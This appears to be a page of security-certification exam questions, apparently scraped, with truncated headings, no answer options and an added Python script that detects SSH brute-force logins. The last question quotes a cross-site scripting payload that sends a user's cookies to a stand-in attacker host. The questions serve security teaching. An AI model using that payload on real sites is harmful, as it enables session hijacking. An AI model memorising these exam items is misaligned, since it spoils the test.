Which of the following will meet this goal without requ…
A security architect is designing a new infrastructure using both type 1 and type 2 virtual machines. In addition
to the normal complement of security controls (e.g. antivirus, host hardening, HIPS/NIDS) the security architect
needs to implement a mechanism to securely store cryptographic keys used to sign code and code modules on
the VMs. Which of the following will meet this goal without requiring any hardware pass-through
implementations?
what is occurring and the BEST immediate response?
A security administrator is shown the following log excerpt from a Unix system:
2013 Oct 10 07:14:57 web14 sshd[1632]: Failed password for root from 198.51.100.23 port 37914 ssh2
2013 Oct 10 07:14:57 web14 sshd[1635]: Failed password for root from 198.51.100.23 port 37915 ssh2
2013 Oct 10 07:14:58 web14 sshd[1638]: Failed password for root from 198.51.100.23 port 37916 ssh2
2013 Oct 10 07:15:59 web14 sshd[1640]: Failed password for root from 198.51.100.23 port 37918 ssh2
2013 Oct 10 07:16:00 web14 sshd[1641]: Failed password for root from 198.51.100.23 port 37920 ssh2
2013 Oct 10 07:16:00 web14 sshd[1642]: Successful login for root from 198.51.100.23 port 37924 ssh2
Which of the following is the MOST likely explanation of what is occurring and the BEST immediate response?
(Select TWO).
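The pattern in the excerpt above (a burst of failed root logins from one source, then a success from the same source within seconds) is exactly what a simple log-correlation rule should flag. The following is an added, defender-side example and is not part of the question set: it parses the six lines shown above, groups events by source address and user, and raises an alert when a successful login is preceded by a threshold of failures inside a time window. The threshold of 3 failures and the 300-second window are assumed tuning values, and the regex accepts both the excerpt's "Successful login" wording and the standard OpenSSH "Accepted password" wording.

```python
import re
from collections import defaultdict
from datetime import datetime

# The log excerpt from the question above, embedded here as sample input.
LOG_EXCERPT = """\
2013 Oct 10 07:14:57 web14 sshd[1632]: Failed password for root from 198.51.100.23 port 37914 ssh2
2013 Oct 10 07:14:57 web14 sshd[1635]: Failed password for root from 198.51.100.23 port 37915 ssh2
2013 Oct 10 07:14:58 web14 sshd[1638]: Failed password for root from 198.51.100.23 port 37916 ssh2
2013 Oct 10 07:15:59 web14 sshd[1640]: Failed password for root from 198.51.100.23 port 37918 ssh2
2013 Oct 10 07:16:00 web14 sshd[1641]: Failed password for root from 198.51.100.23 port 37920 ssh2
2013 Oct 10 07:16:00 web14 sshd[1642]: Successful login for root from 198.51.100.23 port 37924 ssh2
"""

# Matches the excerpt's format; "Accepted <method>" covers stock OpenSSH wording.
LINE_RE = re.compile(
    r"^(?P<ts>\d{4} \w{3} \d{2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<outcome>Failed password|Successful login|Accepted \w+) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)


def parse_line(line):
    """Turn one sshd log line into an event dict, or None if it does not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%Y %b %d %H:%M:%S")
    success = not m.group("outcome").startswith("Failed")
    return {"ts": ts, "user": m.group("user"), "ip": m.group("ip"), "success": success}


def detect_bruteforce_success(log_text, threshold=3, window_seconds=300):
    """Return one alert per successful login that was preceded, from the same
    (ip, user) pair, by at least `threshold` failures within `window_seconds`.
    Both parameters are assumed tuning values, not taken from the page."""
    failures = defaultdict(list)  # (ip, user) -> timestamps of failed attempts
    alerts = []
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev is None:
            continue  # unrelated or unparseable line
        key = (ev["ip"], ev["user"])
        if not ev["success"]:
            failures[key].append(ev["ts"])
            continue
        # A success: count the failures that fall inside the look-back window.
        recent = [t for t in failures[key]
                  if 0 <= (ev["ts"] - t).total_seconds() <= window_seconds]
        if len(recent) >= threshold:
            alerts.append({
                "ip": ev["ip"],
                "user": ev["user"],
                "failures": len(recent),
                "success_at": ev["ts"].isoformat(),
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce_success(LOG_EXCERPT):
        print(f"ALERT: {alert['failures']} failed logins for {alert['user']} "
              f"from {alert['ip']} followed by success at {alert['success_at']}")
```

On the excerpt this yields a single alert for root from 198.51.100.23 with five prior failures, which is the signal that justifies an immediate containment step (for example blocking the source and forcing the compromised credential to be reset) rather than a routine ticket.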
which of the following steps in system authorization ha…
A security engineer is a new member to a configuration board at the request of management. The company
has two new major IT projects starting this year and wants to plan security into the application deployment. The
board is primarily concerned with the applications’ compliance with federal assessment and authorization
standards. The security engineer asks for a timeline to determine when a security assessment of both
applications should occur and does not attend subsequent configuration board meetings. If the security
engineer is only going to perform a security assessment, which of the following steps in system authorization
has the security engineer omitted?
Which of the following departments’ request is in contr…
Executive management is asking for a new manufacturing control and workflow automation solution. This
application will facilitate management of proprietary information and closely guarded corporate trade secrets.
The information security team has been a part of the department meetings and come away with the following
notes:
-Human resources would like complete access to employee data stored in the application. They would like automated data interchange with the employee management application, a cloud-based SaaS application.
-Sales is asking for easy order tracking to facilitate feedback to customers.
-Legal is asking for adequate safeguards to protect trade secrets. They are also concerned with data ownership questions and legal jurisdiction.
-Manufacturing is asking for ease of use. Employees working the assembly line cannot be bothered with additional steps or overhead. System interaction needs to be quick and easy.
-Quality assurance is concerned about managing the end product and tracking overall performance of the product being produced. They would like read-only access to the entire workflow process for monitoring and baselining.
The favored solution is a user-friendly software application that would be hosted onsite. It has extensive ACL
functionality, but also has readily available APIs for extensibility. It supports read-only access, kiosk automation,
custom fields, and data encryption. Which of the following departments’ request is in contrast to the favored
solution?
Which of the following has been overlooked in securing …
An extensible commercial software system was upgraded to the next minor release version to patch a security
vulnerability. After the upgrade, an unauthorized intrusion into the system was
detected. The software vendor is called in to troubleshoot the issue and reports that all core components were
updated properly. Which of the following has been overlooked in securing the system? (Select TWO).
Which of the following solutions would provide the BEST…
A security administrator notices a recent increase in workstations becoming compromised by malware. Often,
the malware is delivered via drive-by downloads, from malware hosting websites, and is not being detected by
the corporate antivirus. Which of the following solutions
would provide the BEST protection for the company?
Which of the following security concerns does the analy…
An analyst connects to a company web conference hosted on www.webconference.com/meetingID#01234 and
observes that numerous guests have been
allowed to join, without providing identifying information. The topics covered during the web conference are
considered proprietary to the company. Which of the following security concerns does the analyst present to
management?
Which of the following security activities should be im…
A company is in the process of implementing a new front end user interface for its customers; the goal is to
provide them with more self service functionality. The application has been written by developers over the last
six months and the project is currently in the test phase. Which of the following security activities should be
implemented as part of the SDL in order to provide the MOST security coverage over the solution? (Select TWO).
Which of the following are MOST important to include wh…
The Information Security Officer (ISO) is reviewing new policies that have been recently made effective and
now apply to the company. Upon review, the ISO identifies a new requirement to implement two-factor
authentication on the company’s wireless system. Due to budget constraints, the company will be unable to
implement the requirement for the next two years. The ISO is required to submit a policy exception form to the
Chief Information Officer (CIO). Which of the following are MOST important to include when submitting the
exception form? (Select THREE).
A security administrator notices the following line in …
A security administrator notices the following line in a server’s security log:
<input name='credentials' type='TEXT' value='" + request.getParameter('><script>document.location='http://badsite.com/?q='document.cookie</script>') + "';
The administrator is concerned that it will take the developer a lot of time to fix the application that is running on
the server. Which of the following should the security administrator implement to prevent this particular attack?